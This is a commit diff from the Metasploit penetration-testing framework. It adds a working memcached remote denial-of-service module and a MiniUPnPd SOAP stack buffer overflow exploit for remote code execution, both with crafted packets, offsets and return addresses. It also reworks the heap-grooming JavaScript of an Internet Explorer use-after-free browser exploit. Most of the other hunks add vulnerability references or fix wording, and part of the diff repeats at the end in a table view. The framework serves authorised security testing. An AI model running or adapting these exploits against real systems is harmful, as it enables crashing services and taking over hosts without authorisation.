Merge branch 'master' into feature/mdm_version_bump

David Maloney · David Maloney · commit 6c013260f171 · 2013-06-04T11:37:53.000-05:00
Conflicts:
	Gemfile
	Gemfile.lock
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -65,7 +65,7 @@ DEPENDENCIES
   database_cleaner
   factory_girl (>= 4.1.0)
   json
-  metasploit_data_models (~> 0.16.0)
+  metasploit_data_models (~> 0.15.2)
   msgpack
   nokogiri
   pcaprub
diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb
@@ -0,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Memcached Remote Denial of Service',
+			'Description'   => %q{
+				This module sends a specially-crafted packet to cause a
+				segmentation fault in memcached v1.4.15 or earlier versions.
+			},
+			'References' =>
+				[
+					[ 'URL', 'https://code.google.com/p/memcached/issues/detail?id=192' ],
+					[ 'CVE', '2011-4971' ],
+					[ 'OSVDB', '92867' ]
+				],
+			'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
+			'License'      => MSF_LICENSE
+		))
+
+		register_options([Opt::RPORT(11211),], self.class)
+	end
+
+	def is_alive?
+		begin
+			connect
+			disconnect
+		rescue Rex::ConnectionRefused
+			return false
+		end
+
+		return true
+	end
+
+	def run
+		connect
+		pkt =  "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"
+		pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
+		pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+		pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+		print_status("#{rhost}:#{rport} - Sending dos packet...")
+		sock.put(pkt)
+		disconnect
+
+		print_status("#{rhost}:#{rport} - Checking host status...")
+		select(nil, nil, nil, 1)
+
+		if is_alive?
+			print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
+		else
+			print_good("#{rhost}:#{rport} - Tango down")  # WWJS - What would th3j35t3r say?
+		end
+	end
+end
diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb
@@ -18,7 +18,7 @@ def initialize(info={})
 		super(update_info(info,
 			'Name'           => 'CouchDB Login Utility',
 			'Description'    => %{
-				This module will test CouchDB logins on a range of
+				This module tests CouchDB logins on a range of
 				machines and report successful logins.
 			},
 			'Author'         =>
diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb
@@ -117,7 +117,7 @@ def run_host(target_host)
 					print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}")
 				end
 			else
-				print_status("[#{target_host}] SVN Entries file found.")
+				print_good("[#{target_host}:#{rport}] SVN Entries file found.")
 
 				report_web_vuln(
 					:host	=> target_host,
diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb
@@ -29,6 +29,7 @@ def initialize(info={})
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '85462'],
 					[ 'BID', '55050'],
 					[ 'EDB', '20551' ]
 				],
diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb
@@ -35,6 +35,7 @@ def initialize(info = {})
 			'References'  =>
 				[
 					[ 'CVE', '2013-0136' ],
+					[ 'OSVDB', '93444' ],
 					[ 'US-CERT-VU', '701572' ],
 					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
 				],
diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
@@ -30,6 +30,7 @@ def initialize(info={})
 			'References'     =>
 				[
 					[ 'CVE', '2012-0297' ],
+					[ 'OSVDB', '82925' ],
 					[ 'BID', '53444' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
 					[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb
@@ -36,6 +36,7 @@ def initialize(info={})
 			'References'     =>
 				[
 					['CVE', '2011-4828'],
+					['OSVDB', '77183'],
 					['BID', '50706'],
 					['URL', 'http://bugs.v-cms.org/view.php?id=53'],
 					['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb
@@ -46,6 +46,7 @@ def initialize(info={})
 			'References'    =>
 				[
 					[ 'EDB', '25406' ],
+					[ 'OSVDB', '93287' ],
 					[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
 				],
 			'Targets'       =>
diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb
@@ -62,6 +62,7 @@ def initialize(info={})
 				'References'    =>
 					[
 						[ 'CVE', '2009-2692' ],
+						[ 'OSVDB', '56992' ],
 						[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
 						[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
 					],
diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
@@ -0,0 +1,126 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	 http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	include Msf::Exploit::Remote::HttpClient
+	Rank = NormalRanking
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+			'Description'    => %q{
+					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
+				present in the SOAPAction HTTP header handling.
+			},
+			'Author'         =>
+				[
+					'hdm', # Vulnerability discovery
+					'Dejan Lukan' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'DefaultOptions' => { 'EXITFUNC' => 'process', },
+			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
+			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
+			# of the program is never reached)
+			'Payload'        =>
+				{
+					'Space' => 2060,
+					'BadChars' => "\x00\x22",
+					'DisableNops' => true
+				},
+			'Platform'       => 'linux',
+			'References'     =>
+				[
+					[ 'CVE', '2013-0230' ],
+					[ 'OSVDB', '89624' ],
+					[ 'BID', '57608' ],
+					[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
+				],
+			'Targets'        =>
+				[
+					[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
+						{
+							'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
+							'Offset' => 2123
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 27 2013',
+		))
+
+		register_options([
+			Opt::RPORT(5555),
+		], self.class)
+	end
+
+	def exploit
+		#
+		# Build the SOAP Exploit
+		#
+		# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
+		sploit	= "\xeb\x2d"
+
+		# a valid action
+		sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
+
+		# payload
+		sploit += payload.encoded
+
+		# nops
+		sploit += rand_text(target['Offset'] - sploit.length - 16)
+
+		# overwrite registers on stack: the values are not used, so we can overwrite them with anything
+		sploit += rand_text(4)		 # overwrite EBX
+		sploit += rand_text(4)		 # overwrite ESI
+		sploit += rand_text(4)		 # overwrite EDI
+		sploit += rand_text(4)		 # overwrite EBP
+
+		# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
+		# stack points directly to the string after 'Soapaction: ', which is why we must
+		# throw the first value on the stack away, which we're doing with the pop ebp
+		# instruction. Then we're returning to the next value on the stack, which is
+		# exactly the address that we want.
+		sploit += [target.ret].pack('V')
+
+		# the ending " character is necessary for the vulnerability to be reached
+		sploit += "\""
+
+		# data sent in the POST body
+		data =
+			"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
+			"<SOAP-ENV:Envelope\r\n" +
+			"	SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
+			">\r\n" +
+			"<SOAP-ENV:Body>\r\n" +
+			"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
+			"</ns1:action>\r\n" +
+			"</SOAP-ENV:Body>\r\n" +
+			"</SOAP-ENV:Envelope>\r\n"
+
+		#
+		# Build and send the HTTP request
+		#
+		print_status("Sending exploit to victim #{target.name} at ...")
+		send_request_cgi({
+			'method'	=> 'POST',
+			'uri'		 => "/",
+			'headers' => {
+				'SOAPAction' => sploit,
+			},
+			'data'		=> data,
+		})
+
+		# disconnect from the server
+		disconnect
+	end
+end
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -71,6 +71,8 @@ def initialize(info = {})
 				[
 					['CVE', '2013-0758'],  # navigate a frame to a chrome:// URL
 					['CVE', '2013-0757'],  # bypass Chrome Object Wrapper to talk to chrome://
+					['OSVDB', '89019'],  # maps to CVE 2013-0757
+					['OSVDB', '89020'],  # maps to CVE 2013-0758
 					['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
 					['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
 				],
diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb
@@ -21,10 +21,10 @@ def initialize(info = {})
 					This module exploits a remote command execution vulnerability in Apache Struts
 				versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
 				arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
-				When targeting an action which requires interaction through GET the payload should
-				be split having into account the uri limits. In this case, if the rendered jsp has
-				more than one point of injection, it could result in payload corruption. It should
-				happen only when the payload is larger than the uri length.
+				When targeting an action which requires interaction through GET, the payload should
+				be split, taking into account the URI limits. In this case, if the rendered JSP has
+				more than one point of injection, it could result in payload corruption. This should
+				happen only when the payload is larger than the URI length.
 			},
 			'Author'         =>
 				[
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -248,9 +248,9 @@ def exploit
 			'method'       => 'GET'
 		}, 20)
 		if (! res)
-			print_warning("WARNING: Undeployment failed on #{path} [No Response]")
+			print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]")
 		elsif (res.code < 200 or res.code >= 300)
-			print_warning("Deletion failed on #{path} [#{res.code} #{res.message}]")
+			print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
 		end
 
 		handler
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -222,7 +222,6 @@ def load_exploit_html(my_target, cli)
 		<meta>
 			<?IMPORT namespace="t" implementation="#default#time2">
 		</meta>
-
 		<script>
 		#{js_mstime_malloc}
 
@@ -234,43 +233,36 @@ def load_exploit_html(my_target, cli)
 			}
 			sparkle += unescape("AB");
 			sparkle += unescape("#{js_payload}");
-
 			magenta = unescape("#{align_esp}");
-
 			for (i=0; i < 0x70/4; i++) {
 				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
 				else               { magenta += unescape("#{align_esp}"); }
 			}
-
 			magenta += sparkle;
 
+			document.body.contentEditable="true";
 			f0 = document.createElement('span');
-			document.body.appendChild(f0);
 			f1 = document.createElement('span');
-			document.body.appendChild(f1);
 			f2 = document.createElement('span');
+			document.body.appendChild(f0);
+			document.body.appendChild(f1);
 			document.body.appendChild(f2);
-			document.body.contentEditable="true";
+			for (i=0; i < 20; i++) { document.createElement("img"); }
 			f2.appendChild(document.createElement('datalist'));
 			f1.appendChild(document.createElement('span'));
+			CollectGarbage();
 			f1.appendChild(document.createElement('table'));
-
 			try      { f0.offsetParent=null;}
 			catch(e) { }
-
 			f2.innerHTML = "";
-			f0.appendChild(document.createElement('hr'));
 			f1.innerHTML = "";
-
-			CollectGarbage();
+			f0.appendChild(document.createElement('hr'));
 			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}
-
 		</script>
 		</head>
 		<body onload="eval(helloWorld());">
 		<t:ANIMATECOLOR id="myanim"/>
-
 		</body>
 		</html>
 		|
diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb

Original file line number	Diff line number	Diff line change
`@@ -29,6 +29,7 @@ def initialize(info={})`
`29`	`29`	`],`
`30`	`30`	`'References' =>`
`31`	`31`	`[`
	`32`	`+ [ 'OSVDB', '85462'],`
`32`	`33`	`[ 'BID', '55050'],`
`33`	`34`	`[ 'EDB', '20551' ]`
`34`	`35`	`],`
Original file line number	Diff line number	Diff line change
`@@ -35,6 +35,7 @@ def initialize(info = {})`
`35`	`35`	`'References' =>`
`36`	`36`	`[`
`37`	`37`	`[ 'CVE', '2013-0136' ],`
	`38`	`+ [ 'OSVDB', '93444' ],`
`38`	`39`	`[ 'US-CERT-VU', '701572' ],`
`39`	`40`	`[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]`
`40`	`41`	`],`
Original file line number	Diff line number	Diff line change
`@@ -30,6 +30,7 @@ def initialize(info={})`
`30`	`30`	`'References' =>`
`31`	`31`	`[`
`32`	`32`	`[ 'CVE', '2012-0297' ],`
	`33`	`+ [ 'OSVDB', '82925' ],`
`33`	`34`	`[ 'BID', '53444' ],`
`34`	`35`	`[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],`
`35`	`36`	`[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]`
Original file line number	Diff line number	Diff line change
`@@ -36,6 +36,7 @@ def initialize(info={})`
`36`	`36`	`'References' =>`
`37`	`37`	`[`
`38`	`38`	`['CVE', '2011-4828'],`
	`39`	`+ ['OSVDB', '77183'],`
`39`	`40`	`['BID', '50706'],`
`40`	`41`	`['URL', 'http://bugs.v-cms.org/view.php?id=53'],`
`41`	`42`	`['URL', 'http://xforce.iss.net/xforce/xfdb/71358']`
Original file line number	Diff line number	Diff line change
`@@ -46,6 +46,7 @@ def initialize(info={})`
`46`	`46`	`'References' =>`
`47`	`47`	`[`
`48`	`48`	`[ 'EDB', '25406' ],`
	`49`	`+ [ 'OSVDB', '93287' ],`
`49`	`50`	`[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC`
`50`	`51`	`],`
`51`	`52`	`'Targets' =>`
Original file line number	Diff line number	Diff line change
`@@ -62,6 +62,7 @@ def initialize(info={})`
`62`	`62`	`'References' =>`
`63`	`63`	`[`
`64`	`64`	`[ 'CVE', '2009-2692' ],`
	`65`	`+ [ 'OSVDB', '56992' ],`
`65`	`66`	`[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],`
`66`	`67`	`[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],`
`67`	`68`	`],`